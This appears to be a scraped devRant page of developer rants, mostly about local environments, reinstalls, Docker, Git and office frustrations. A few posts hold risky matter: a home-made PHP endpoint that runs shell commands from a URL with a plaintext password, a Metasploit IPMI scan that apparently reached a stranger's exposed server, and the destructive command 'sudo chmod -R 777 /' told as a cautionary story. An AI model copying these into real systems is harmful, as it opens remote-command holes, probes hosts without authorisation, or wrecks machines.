I HATE SURFACES SO FRICKING MUCH. OK, sure they're decent when they work. But the problem is that half the time our Surfaces here DON'T work. From not connecting to the network, to only one external screen working when docked, to shutting down due to overheating because Microsoft didn't put fans in them, to the battery getting too hot and bulging.... So. Many. Problems. It finally culminated this past weekend when I had to set up a Laptop 3. It already had a local AD profile set up, so I needed to reset it and let it autoprovision. Should be easy. Generally a half-hour or so job. I perform the reset, and it begins reinstalling Windows. Halfway through, it BSOD's with a NO_BOOT_MEDIA error. Great, now it's stuck in a boot loop. Tried several things to fix it. Nothing worked. Oh well, I may as well just do a clean install of Windows. I plug a flash drive into my PC, download the Media Creation Tool, and try to create an image. It goes through the lengthy process of downloading Windows, then begins creating the media. At 68% it just errors out with no explanation. Hmm. Strange. I try again. Same issue. Well, it's 5:15 on a Friday evening. I'm not staying at work. But the user needs this laptop Monday morning. Fine, I'll take it home and work on it over the weekend. At home, I use my personal PC to create a bootable USB drive. No hitches this time. I plug it into the laptop and boot from it. However, once I hit the Windows installation screen the keyboard stops working. The trackpad doesn't work. The touchscreen doesn't work. Weird, none of the other Surfaces had this issue. Fine, I'll use an external keyboard. Except Microsoft is brilliant and only put one USB-A port on the machine. BRILLIANT. Fortunately I have a USB hub so I plug that in. Now I can use a USB keyboard to proceed through Windows installation. However, when I get to the network connection stage no wireless networks come up. At this point I'm beginning to realize that the drivers which work fine when navigating the UEFI somehow don't work during Windows installation. Oh well. I proceed through setup and then install the drivers. But of course the machine hasn't autoprovisioned because it had no internet connection during setup. OK fine, I decide to reset it again. Surely that BSOD was just a fluke. Nope. Happens again. I again proceed through Windows installation and install the drivers. I decide to try a fresh installation *without* resetting first, thinking maybe whatever bug is causing the BSOD is also deleting the drivers. No dice. OK, I go Googling. Turns out this is a common issue. The Laptop 3 uses wonky drivers and the generic Windows installation drivers won't work right. This is ridiculous. Windows is made by Microsoft. Surface is made by Microsoft. And I'm supposed to believe that I can't even install Windows on the machine properly? Oh well, I'll try it. Apparently I need to extract the Laptop 3 drivers, convert the ESD install file to a WIM file, inject the drivers, then split the WIM file since it's now too big to fit on a FAT32 drive. I honestly didn't even expect this to work, but it did. I ran into quite a few more problems with autoprovisioning which required two more reinstallations, but I won't go into detail on that. All in all, I totaled up 9 hours on that laptop over the weekend. Suffice to say our organization is now looking very hard at DELL for our next machines.4
-
I’ve been a solo frontend developer for a couple of weeks now with critical enormous features and some bugs to get out the door by the end of next week.
On top of that, I got a backend bug to fix which is fine since I know the stack. The SQL that’s causing a bug is an obvious fix but as a FE dev I have no damn idea about DB structure.
I decide to setup local DB to see it for myself. So as a reasonable developer I look for docs to set it up since it sounds like quite a process after confirming with colleagues.
ANNNND... SURPRISE, the docs ARE NON EXISTENT unless you wanna call an outdated diagram a sufficient doc. Just so you understand the pain, we have 9 micro services, a weird db structure and only 5% is documented.
I requested help from my colleagues, but their answers were similar to docs with a follow up of “maybe you can document it after you set this up”. Barely stopped myself from asking “do I look like I have time for this crap? Why don’t you document it SINCE YOUR SETUP IS READY TO GO?”
So I’ve been at it for a couple of hours and I gave up. Will go back to frontend development since still a ton of shit to do anyway. Tomorrow I will attempt this again.3 -
So... My boss is "hard working", meaning that she'd rather edit and upload a html file every morning at 5am for the last 5 years and manually send a push notification notifying the user that the new file is up than learning a little bit about automation (cron? IFTTT?) and even after letting her know about those options she has "no time"
She'd rather keep source code (pug, sass), manually build on local computer and upload to live servers instead of learning git and letting me setup once and for all CI/CD
SERIOUSLY!?!? NO TIME!?!? But there's time to do things at a turtle pace like in the 90s... 🤦♂️5 -
TL;DR: When picking vendors to outsource work to, vet them really well.
Backstory:
Got a large redesign project that involves rebuilding a website's main navigation (accessibility reasons).
Project is too big just for our dev team to handle with our workload so we got to bring a 3rd party vendor to help us. We do this often so no big deal.
But, this time the twist was Senior Management already had retained hours with a dev shop so they want us to use them for project. Okay...
It begins:
Have our scope / discovery meeting about the changes and our expected DevOps workflow.
Devs work Local and push changes to our Github, that kicks off the build and we test on Dev, then it goes to Staging for more testing & PM review. Once ready we can push to prod, or whenever needed. All is agreed, everyone was happy.
Emailed the vendors' project manager to ask for their devs Github accounts so we can add them to the project. Got no reply for 3 days.
4th day, I get back "Who sets up the Github accounts?"
fuck me. they've never used Github before but in our scope meeting 4 days ago you said Github was fine...??
Whatever, fuck it. I'll make the accounts and add them.
Added 4 devs to the repo and setup new branch. 40min later get an email that they can't setup dev environment now, the dev doesn't know how to setup our CMS locally, "not working for some reason."
So, they ask for permission to develop on our STAGING server.. "because it's already setup"... they want to actively dev on our staging where we get PM/Senior Management approvals?
We have dev, staging, production instances and you want to dev in staging, not dev?... nay nay good sir.
This is whom senior management wants us to use, already paid for via retainer no less. They are a major dev shop and they're useless...
😢😭
Cant wait for today's progress checkup meeting. 😐😐
/rant1 -
!rant
Just finished my first game jam officially, it was fun and our game though being not working 100% was well done, we had art people and a sound guy, who btw made some amazing music for the game. A couple of us plan to work on the game after the jam (because we have time) and since it's more of a local jam our deadline for submission is extended until a week after the jam finishes. (Game broke after merge issues :D)
Glad I decided to go and try it out.
Hah but my issue was that moreso my time was spent on getting unity and a git gui or some sort to work on Linux mint, by half way through Saturday I did lol. Also not much for me to do since we had a total of six programmers.
So if I don't get a new laptop for the next game jam, it's setup to work, which is awesome.2 -
Firefox developer fucked up this morning my development after the update -_-
The fucking "Enhancing Tracking Protection" was on a local Wi-Fi IP address(192.168...) which automatically redirected to the https of that IP, but I did setup kestrel to listen on HTTP, which resulted in a nice "Cannot enstablich a secure connection(and suck it up because ¯\_(ツ)_/¯)"
Fortunately it's easy to get rid off this cunt, just go on the shield nearby the address and disable that motherfucker.
ps: sorry for the lil rage, my morning train trip development brain cells should not be bothered by this automatic technical troubles
Further question to the Firefox developers:
WHAT THE FUCK are you thinking when you force developers to automatic HTTPS redirection when you should know more than anyone that development is 360deg(and not 90 like your mom)1 -
A newly joined developer (who was supposed to be very senior) comes and asks me how to write a test cos for some reason the person didn't know how to mock.
In Java,
(same for any other implementation which has an interface)
Writes Arraylist list =.....
Instead of List list = Arraylist...
Deployed code (another engineer from another country helped to deploy since this new senior dev didn't have access yet.
But the new senior dev didn't update relevant files in production code which brought down the site for nearly an hour. Mistake aside, the first reaction from this new senior dev is 'WHY DIDN'T THE DEV THAT WAS HELPING DIDN'T DO THE FILE UPDATE?'
This was followed by some other complaints such as our branching stragies are wrong. When in fact the new senior dev made a mistake by just making assumptions on our git branching strategies and we already advised on correct process.
Out of all these, guess this is the best part. The senior dev never tested code locally! Just wrote code, unit test and send to QA and somehow the test passed through. I learnt this when I realised this dev... has not even set up the local environment yet.
I keep saying new but this Senior dev been around like 3 months! This person is in another team within our larger team but shares same code base. I am puzzled how do you not set up your environment for 3 months. Don't you ask for help if you are stuck? I am pretty sure the env is still not setup.
Am I over reacting or is this one disgusting developer who doesn't even qualify for an intern let alone a senior dev? It's so revolting I can't even bring myself to offer help.8 -
So one of my employees pointed it local setup on the live database to test some weird behavior in an algorithm. Then he starte the next task and wiped his database to reload the fixtures. After that he realized, that he still had the live database credentials in his configuration file.1
-
!Rant #lazy
I setup my local server so I can test my apps and to mount my partitions on my www folder in a folder named "mnt" with numbered folders for each mounted partition
So I can access and download my files to phone and other devices from all over the network :)
And even watch movies that are in my computer on my phone or tv
And when I want to sleep I usually watch a movie or one episode of series which is stored in my pc ,on my phone by this method in my bed 😅
So the thing is I'm too lazy to get out of bed and shut down the server and pc
So I setup this file so I can run commands on my PC from my phone 😅😂😂😂
192.168.1.110/server.php?cmd=shutdown now&psw=mypassword7 -
I work for an investment wank. Worked for a few. The classic setup - it's like something out of a museum, and they HATE engineers. You are only of value if work on the trade floor close to the money.
They treat software engineering like it's data entry. For the local roles they demand x number of years experience, but almost all roles are outsourced, and they take literally ANYONE the agency offers. Most of them can't even write a for loop. They don't know what recursion is.
If you put in a tech test, the agency cries to a PMO, who calls you a bully, and hires the clueless intern. An intern or two is great, if they have passion, but you don't want a whole department staffed by interns, especially ones who make clear they only took this job for the money. Literally takes 100 people to change a lightbulb. More meetings and bullshit than development.
The Head of Engineering worked with Cobol, can't write code, has no idea what anyone does, hates Agile, hates JIRA. Clueless, bitter, insecure dinosaur. In no position to know who to hire or what developers should be doing. Randomly deletes tickets and epics from JIRA in spite, then screams about deadlines.
Testing is the same in all 3 environments - Dev, SIT, and UAT. They have literally deployment instructions they run in all 3 - that is their "testing". The Head of Engineering doesn't believe test automation is possible.
They literally don't have architects. Literally no form of technical leadership whatsoever. Just screaming PMOs and lots of intern devs.
PMO full of lots of BAs refuses to use JIRA. Doesn't think it is its job to talk to the clients. Does nothing really except demands 2 hour phone calls every day which ALL developers and testers must attend to get shouted at. No screenshare. Just pure chaos. No system. Not Agile. Not Waterfall. Just spam the shit out of you, literally 2,000 emails a day, then scream if one task was missed.
Developers, PMO, everyone spends ALL day in Zoom. Zoom call after call. Almost no code is ever written. Whatever code is written is so bad. No design patterns. Hardcoded to death. Then when a new feature comes in that should take the day, it takes these unskilled devs 6 months, with PMO screaming like a banshee, demanding literally 12 hours days and weekends.
Everything on spreadsheets. Every JIRA ticket is copy pasted to Excel and emailed around, though Excel can do this.
The DevOps team doesn't know how to use Jenkins or GitHub.
You are not allowed to use NoSQL database because it is high risk.2 -
RAAAAAAH fuck fuck fucking shit!!! Fuck jest Typescript "on the fly" compilation esModuleInterop typeroots, missing definitions jest ts-ignore and xtest everywhere, manual npm linking with different pkg mgrs & pub to a private registry, building docker images locally and doing tag management across git, docker & kubernetes then cross fingers that prod which has 0 common setup with local & test somehow works, open architecture "tickets" and wait months before they resolve, then repeat ad infinitum. How the fuck can I be productive when I need to be all over the place all the time and deal with these meta-code shenanigans. I just wanna code, damned3
-
Its 5:32 am been working on a new social media website opened up devrant to check whatsup and found out people really have amazing pc setups ♥️ I couldn’t post mine because my laptop has a broken keyboard and i use a usb keyboard also my laptop overheats so i stuck skateboard wheels to two of the back supports its an i5 processor with 3gb of ram but I love it,its what you do with your resources that really matters right ? with that broken keyboard i created a website for my college department which now 720 students and teachers use and we have around 8k entries in 3 days. Running the website on a local server at my college so no money spent on hosting. Taking small steps towards my goals and hopefully one day i’ll publish my setup1
-
Have defective supermicro server, but the ipmi is working and could tell me what's going on.
Only problem is, I don't have access to it since the last owner didn't provide it to me.
So I thought let's try metasploit.
Setup local network with a second server, connect to local* address.
"Welcome to intel integrated BMC web console"
What? Its a Supermicro, did the owner reflash the ipmi? What the heck.
Msf: scan adress ....
ipmi found bla bla bla.
Msf: zero cipher scan.
... Voulnerable to zero cipher.
Was pretty happy but the doubt kept creeping in.
On my WS that isn't connected to the ipmi of my server, I go to that ip address.
Bam
"Welcome to intel BMC ......"
MOTHERFUCKER.
What are the odds that some fucker has his ipmi open to the public on that exact same address that my board was configured to.
Well, actually pretty high I guess.
Fuck. Shit.
That didn't go as planned. -
!rant from a support guy
I was tasked to migrate an Exchange 2003 server (yes, those are still used) for an upcoming Office 365 deployment. There are no direct upgrade path from one another, as far as we know
My task was to export PSTs from mailboxes. Great, a native tool exist for that in 2003 (exmerge). But only for less than 2 GB mailboxes because ANSI/Unicode! Half of our mailbox busts that limit. Oh, it seems Exchange 2007 has a PowerShell command for exporting to PST as well! But pre-SP3, that command relies on a local installation of Outlook on the server (DAFUQ), and has been superseded by another "standalone" powershell command. So I install a bogus Windows 2012 server only for that purpose, with Exchange Management Tools (which, by the way, is bundled with the Exchange installation setup and REQUIRES to have IIS installed on the target machine. Also, if you install ONLY the Exchange 2007 Management Tools and wish to uninstall them afterwards, you can't because the uninstaller wants me to select an Exchange Role to remove, which are all unchecked in my tools-only setup). Never worked, and Google-fu says that the newer Exchange 2007 New-MailboxExportRequest command seems to have removed Exchange 2003 support.
So i'm back to installing a pre-SP3 Exchange 2007. Then the older Export-Mailbox powershell command whines about 64bits and 32bit incompatiblity-- actually I ***HAVE*** to have the whole OS/software stack 32bit ONLY. Don't ask me why!
Some article I found says I could fire up an XP virtual machine for that, I go for Win 7 x86. "Sorry, Microsoft Exchange won't be installed on a workstation environment because reasons." All right then, let's go for an old Windows Server 2003 x86. Have you tried to boot this up in an Hyper-V environment where mouse and keyboard support for Windows Server 2003 are apparently optional? No keyboard AND mouse events sent to the guest machine at all.
* Sigh *, let's use a Windows Server 2008, but WATCH OUT! Microsoft has discontinued x86 support on their W2008 R2 release, so non-R2 for me. Even then, mouse event wasn't sent until I installed guest additions.
After all, export-mailbox ended up working, but that costed me two days of banging my head against the wall. (Oh, and I take internal calls inbetween as well...)
And that's why I aspire to be a programmer. Thank you for nothing, Microsoft!4 -
What's your workspace setup?
Curious because it took awhile and a lot of experimenting/thinking to get mine setup the way it is, but now I can't even think properly unless I have things setup that way after booting up in the morning.
Here goes:
Workspace 1: General stuff, personal email. social media, random research for non work related things, etc
Workspace 2: My main project local development, includes terminals, database, browser research for bugs, debugging software, error logs, etc.
Workspace 3: My main project, production workspace, consoles, browser, etc related to production server, you get the idea
Workspace 4: local dev on my side project
I found it crucial to setup workspace 2 and 3, it has helped me avoid countless stupid errors, like, for example, accidentally working on production terminal and wanting to rip my hair out wondering why the fuck _____ isn't working, then realizing, oh shit, i'm on production, not local. Huge brainspace bandwidth saver when I setup like this.
How about you?2 -
No actual data loss here, but the feeling of data loss.
After having my data scattered across several devices i decided to get a grip on it use a cloud. I'm too paranoid for a real cloud so i used a local nextcloud installation. That was done via docker and with a 2TB raid1-array.
I noticed that after restarting the server the cloud was somehow reset and pointed me to the setup-page, afterwards my files were already there. It did strike me as odd but i figured "maybe don't restart the server in the next time".
But i did restart it. And this time i had to setup the cloud again, but my files were gone. I got close to a heart attack, even though all those files weren't that valuable. I ripped one disk from the usb hub, connected it to my laptop and tried to mount it, but raid array. Instead i started photorec and recovered a bunch of files, even though their names were some random hex and i knew i'd spend my next weeks sorting my files. While photorec ran i inspected the docker container and saw that there were only 10GB of space available. After a while and one final df i found the culprit: the raid. For some reason the raid wasn't mounted at boot and docker created the volumes on the servers hard disk, same goes for the container data. After re-adding the disk to the hub i mounted the raid and inspected everything again. All my files were still there.
At no point did i lose my data, but the thought was shocking enough. It'd be best not to fiddle with this server in the next time. -
Today i chartered new realms for me.
I created a new hyper-v vm on the company windows servers and added a 5th instance to it, but instead of running another windows server i installed an ubuntu 18.04 (cause i am a bit familiar with debian from my raspberry pi)
we have two servers, one which runs the 4 vms and a replica. I first had the new vm on the main server but it occured me to move it instead to the unusued replica machine. That kinda worked..i did a planned failover but the main server isnt configured to be the replica..and even when activating that it didnt work. This is weird.
For the moment i ignored that and proceeded to install nginx, mariadb and php 7.2..basically the lemp stack. I managed to setup nginx and a static ip adress for the machine (which was different from how i remembered it to do (in 18.04 its not done with the network conf but a yaml file).
in the end i added two different virtual servers, one for actual use and one for dev stuff (with phpmyadmin running for instance), listening on port 80 and some random other port.
as a test i brought a mediawiki onto the Port 80 server and it worked.
on monday i have to figure out how to implement the wildcard certificate i have for our company domain (internal dns simply routes intranet.company.com to the local server vm)
i am mighty proud cause all my experience with linux was with a raspberry pi so far and i am fairly certain i did it right and without shortcuts this time. (unlike my raspberry experience)
just wanted to share
(i also sweated a lot of blood when editing the hyper v settings as i did not set up the server in the first place)
((i also installed xrdp and a mate desktop, but i am less proud of that, but sometimes seeing folders graphically helps me)) -
I got a new computer. Ended up getting a Sager Laptop. I also ended up getting Windows 10 Pro. I had forgotten how shitty Windows 10 has gotten. My biggest gripe are the start button (fixed using open shell) and the creation and adding users. Microshit goes out of their way to trick you into getting a POS MS account. I knew the trick when my PC first started to stay offline so MS could not force a MS account. However, I added a user later and again they are fucking with you to force a user account. Figured out which non-descript place to click to just add a local account. This is shitty behavior of an OS. Especially one that claims to be Pro. This is not how to win customers. It just aggravates people that know what they are doing.
The bright side to this is could take out my frustration after I moved my Fallout 4 setup to the new computer. Mod Organizer 2 makes it easy to move everything at once. Configured one config file and boom I can now run it on Ultra settings. Explode a few skulls and reduce a few more to radioactive ash/goo. Frustrations are gone. lol
Also on the bright side with running Pro. I can select Update control via group policy. This doesn't seem to work on Home.13 -
!rant
...
.UseKestrel(options =>
{
options.Listen(new IPAddress(new byte[]{ 192, 168, 178, 20 }), 5000);
})
...
Look at this easy piece of code(that I added) from an Asp.NET Core 2 template project(MVC). I needed only to add this piece of code to WebHost.CreateDefaultBuilder() (in the Program.cs) to be able to setup a working WebServer which will listen and answer on that IP(local network machine IP) and port, then I opened that port from my modem on this local IP, then used DynDNS with noip.com, tested out on my smartphone with 4G connection and it does work!
This is the EASIEST web project setup and test that I've ever tried and that let me showcase something from my machine to the entire world! :')
Great job Microsoft; can't wait to try the cross-platform of this open standard. -
Fuuuuuuuck!!
CR estimates:
Part 1: 2h including testing
Part 2: 2h-2days-maybe never (small changes on horrifically fucked up project noone understands with tons of tech debt)
Managed to pull off the part two in one day.. //yay me?!
Additional day to unfuckup git fuckups (including but not limited to master head not compiling because a smartass included *.cs in .gitignore file which he also pushed..don't ask, I have no clue why..) which was a huuuge deal for me as I usually use only local repo and had no idea how to tackle this.. coworker helped out.. seems I was on the right way, but git push branchy was acting up & said I had to login & ofc I had no clue what the pass was set to (first setup was more than 2yrs ago)..so new key, new pass.. all good.. yay!
Back to the original story/rant: Now I'm stuck with writing jira explanation why it was done this way & not the way customer suggested. They offered only vague description anyways which would require me to do a hacky messy thing, ew.. + it most probably would require major data modifications after deployment to even make it work..
Anyhow, this expanation is also easy peasy in english..
BUT...
I must write it in my native tongue.. o.O FML! Spent almost 40mins on one paragraph..
Sooo.. if anyone will petition to ban non english in IT, I'm all for it!!2 -
So I'm looking for a tutorial somewhere to manage auth with react.
I have passport local setup with jwt in express, but looking to manage users in the front-end, managing the user state app wide, logging out, protected routes etc.
I've done some searching around but I can't see anything to concrete. Any pointers or articles would be great.
I was thinking of localStorage but not sure how to go about setting that up with react.3 -
I just realised I have 1TB of MS OneDrive Cloud space lying around unused. DAMNNN!!!
Just yesterday, I was thinking of backing up all my content to cloud (because just in case and past experiences of losing data).
I did a quick fact check and figured that I have ~450 GB of unbacked data.
After quick calculations, I came to a number of how many Google accounts I'll need for 15 GB per account of drive space.
Today, I was playing around with my Microsoft Developer account and saw OneDrive. I thought let's check how much free space does MS Dev subscription offers.
It showed 1024 GB. FUCK! My balls dropped.
Now here's what I did...
I have a local drive of 500 GB, which holds all the unbacked data. Now I setup my local OneDrive there and put everything into OneDrive.
And then, I moved my local Google Drive into OneDrive. A nested setup for important stuff.
So this way, less important stuff is backed up on cloud and accessible everywhere.
And more important stuff gets synced on Google Drive and OneDrive, both.
Did I do the right and sensible thing with this kind of setup?
MS Developer subscription says they expire it in 90 days but until today, they have auto renewed it always.
I still have ~500 GB of space which can be consumed.
Also, overall MS ecosystem seems much better to me than Google. Moreover, MS allows custom domain mapping which Google doesn't.
Let's see how can I entirely migrate to MS ecosystem in near future.18 -
Alright, here we go again with issues on Vector. (My home server that we're transitioning our website, infiniit.co to.)
I'm trying to get the email server up and running. It's a PITA which is evident by the fact we are now on attempt number 6, at least on the 6th VM now. At this time I'm installing a Ubuntu 16.04 LTS ISO and I'll be installing IRedMail unless someone else has any recommendations. So far I've had nothing but problems doing it manually, installing dovecot and postfix, trying to get them linked, and then the last failure was sending a test email locally.
Also, a continuation of the last issue that I had here, now my VMRC isn't working anymore for some reason. Ive forwarded websockets but it won't work unless I use local IP since everything (except direct local IP connections) is running through an apache VHost setup... My head hurts. Help pls.2 -
Any one running Symfony on a Docker container in production? I currently try to migrate our dev env to a docker compose setup (from a "monolith" vagrant vm). I'm atually not stuck at a Symfony specific thing, but on a, I guess Docker specific one(?), The issue is, I need to read and write with two users to one folder (in my case the /application/var/cache folder). Since I mount my whole code into the docker container (to use an IDE on the local files), I've got a volume (not mounted to the outside world) for that folder. (As far, as good). Now this folder is owned by root and root is also the user I get when I enter the container. When I then run a cli script, that writes to this folder, every thing works (as it's run by root) and the resulting entries in the cache dir are owned by root. Trouble starts when the php fpm process tries to write stuff in there too (as it's run by www-data).
If I add `USER www-data` (or create a new user foobar and add `USER foobar`) the container exits with status 0
So I guess the question is, is anyone running an Symfony app on Docker in Prod, if so how do you solve this? Or another question would be what is the best practice to do this? Sure on dev I could just `chmod 777` the whole folder or run the php-fpm process as root, but if that thing ever goes to prod, I wouldn't sleep very well... -
Just setup an IPsec tunnel and route 192.168.50.0/24 to 192.168.0.0/16 over that tunnel on phase2. We will be able to see 192.168.50.6 machine from 192.168.0.0/16 remote subnet.
Do it.
Why we cannot send ICMP echo from local subnet machine to another machine in same subnet??? Also remote subnet hits only the BSD machine it does not go further. Whyy
I know I should have not done it but SDM and my manager insisted to do so... And now they expect me to fix time outs when remote subnet belongs to different company.7 -
This happened to me sometime back.
I want to try out a WordPress plugin in my local machine before installing on a production server. It is an Ubuntu machine. Downloaded and installed Xampp, then setup WordPress with MySQL. Now tried uploading the plugin zip file, it throws some permission error, asking to fix permissions or use FTP. I thought of just chmod 777 recursively for the WordPress directory to fix this easily.
Ran the command, looks like it is hung. Terminated using Ctrl+C and then ran the same command. Again it is taking much time. It should not take so much time to recursively change the permission of just a WordPress directory. Thought something was wrong. Before I realized the damage is already done.
Looks like I ran the command
sudo chmod -R 777 /
instead of
sudo chmod -R 777 ./
Fuck, I missed a dot in the command and it is changing permissions of everything in my machine. Saw the System monitor, CPU usage spiked to 100%. I can't close or open any program. Force shutdown the machine using the power key. It didn't boot again. Recovery mode didn't help. Looks like there is no easy way to restore back from this damage. Most of the files I need are backed up in the cloud, still, need a few more personal files so that I can format and reinstall Ubuntu. Realised I have Windows in dual booting. Boot into Windows and used some ext4 reader to recover the files, formatted and reinstalled the OS. Took a few hours to get back to my previous setup.
Lesson Learned: Don't use sudo unnecessarily.
Double check the command while executing.
Running a wrong command with root permission can fuckup your entire machine. -
Goodbye Ampps, hello Valet!!
Just got a Macbook Pro recently for personal web dev stuff. Previously, I usually use Ampps (like MAMP) for my local development.
But I want to move away from that as I wanted to go through the whole process of setting up my own local dev env.
After 3 days of trial and errors and many deadends, finally managed to get an existing Craft project running on Valet. The most tedious part was figuring out how connect Sequel Pro to local MySQL.
Through this whole process I've learned how to use Homebrew, setup MySQL with Sequel Pro, use Valet and most importantly, learning how to troubleshoot these problems...
Exclaimed a big YES! And mum came rushing into my room thinking I was mad... whateva...
Next step, figure out Docker.
#feellikeimoncloudnine3 -
How do other developers handle local websites that are large in size? Currently the code and site need to be setup for each client for several developers. We use github and bitbucket repos for the code.
The biggest issue is downloading the site files and setting it up locally for each developer. We used Docker for some projects but ran into permission issues and storage space became an issue.14 -
after a long struggle this has become a rant.
we've tried numerous ways to make local server/xamp/bitnami work with ubuntu 14.04 so that we can get working on WP and then setup git repo. thought life would be easy one day.
are we the only one suffering to make this thing work? -
> Get sent to local client that manages most services on prem themselves
> We just deliver the software and setup instructions, client is self-proclaimed "technical enough" to handle the rest
> Never had issues with them, client for about 1,5year, we assume they are indeed technical enough
> Local client needs me for some help with their "backup solution"
> Cron job that dd's entire disk every week to external ssd.
> External ssd finally caved in after what was most likely years of torture
> Has nothing even remotely to do with our software (which has built-in backups, which they apparently don't use)
> I get scolded and screamed at when I say not our problem
Fml2 -
So as a personal project for work I decided to start data logging facility variables, it's something that we might need to pickup at some point in the future so decided to take the initiative since I'm the new guy.
I setup some basic current loop sensors are things like gas line pressures for bulk nitrogen and compressed air but decided to go with a more advanced system for logging the temperature and humidity in the labs. These sensors come with 'software' it's a web site you host internally. Cool so I just need to build a simple web server to run these PoE sensors. No big deal right, it's just an IIS service. Months after ordering Server 2019 though SSC I get 4 activation codes 2 MAK and 2 KMS. I won the lottery now i just have to download the server 2019 retail ISO and... Won't take the keys. Back to purchasing, "oh I can download that for you, what key is yours". Um... I dunno you sent me 4 Can I just get the link, "well you have to have a login". Ok what building are you in I'll drive over with a USB key (hoping there on the same campus), "the download keeps stopping, I'll contact the IT service in your building". a week later I get an install ISO and still no one knows that key is mine. Local IT service suggests it's probably a MAK key since I originally got a quote for a retail copy and we don't run a KMS server on the network I'm using for testing. We'll doesn't windows reject all 4 keys then proceed to register with a non-existent KMS server on the network I'm using for testing. Great so now this server that is supposed to connected to a private network for the sensors and use the second NIC for an internet connection has to be connected to the old network that I'm using for testing because that's where the KMS server seems to be. Ok no big deal the old network has internet except the powers that be want to migrate everything to the new more secure network but I still need to be connected to the KMS server because they sent me the wrong key. So I'm up to three network cards and some of my basic sensors are running on yet another network and I want to migrate the management software to this hardware to have all my data logging in one system. I had to label the Ethernet ports so I could hand over the hardware for certification and security scans.
So at this point I have my system running with a couple sensors setup with static IP's because I haven't had time to setup the DNS for the private network the sensors run on. Local IT goes to install McAfee and can't because it isn't compatible with anything after 1809 or later, I get a message back that " we only support up to 1709" I point out that it's server 2019, "Oh yeah, let me ask about that" a bunch of back and forth ensues and finally Local IT get's a version of McAfee that will install, runs security scan again i get a message back. " There are two high risk issues on your server", my blood pressure is getting high as well. The risks there looking at McAfee versions are out of date and windows Defender is disabled (because of McAfee).
There's a low risk issue as well, something relating to the DNS service I didn't fully setup. I tell local IT just disable it for now, then think we'll heck I'll remote in and do it. Nope can't remote into my server, oh they renamed it well that's lot going to stay that way but whatever oh here's the IP they assigned it, nope cant remote in no privileges. Ok so I run up three flights of stairs to local IT before they leave for the day log into my server yup RDP is enabled, odd but whatever let's delete the DNS role for now, nope you don't have admin privileges. Now I'm really getting displeased, I can;t have admin privileges on the network you want me to use to support the service on a system you can't support and I'm supposed to believe you can migrate the life safety systems you want us to move. I'm using my system to prove that the 2FA system works, at this rate I'm going to have 2FA access to a completely worthless broken system in a few years. good thing I rebuilt the whole server in a VM I'm planning to deploy before I get the official one back. I'm skipping a lot of the ridiculous back and forth conversations because the more I think about it the more irritated I get.1 -
Hey, anyone have experience with email with encryption?
I need to setup TLS for emails for all devices on premises. The printer and other devices does not support TLS.
I'm thinking i could use local exchange server that forwards to our office 365, as we use outlook for the domain. But i would rather use some linux solution.
We have multiple ip's we might send from.1 -
Every time I turn on device mode on Google Chrome devtools I lose my session (I'm assuming it deletes the cookies).
1. Is this just in my local setup?
2. Is there a way to keep my current session every time I turn on/off device mode on Chrome?
3. What other solutions would I have to do live tests of responsive design on my website?
Thanks!5 -
! Rant
Recently received my ESP8266 and for bad or for worse quickly flashed it to use thingsSDK and espruino.
I have setup a webserver on it but at the moment you need to go to its local ip to see the page, does any one have tryed this before and overcome to redirect all requests to that page? Any ideas are welcome, i know this can be done easly with LUA but cant code LUA, yet...13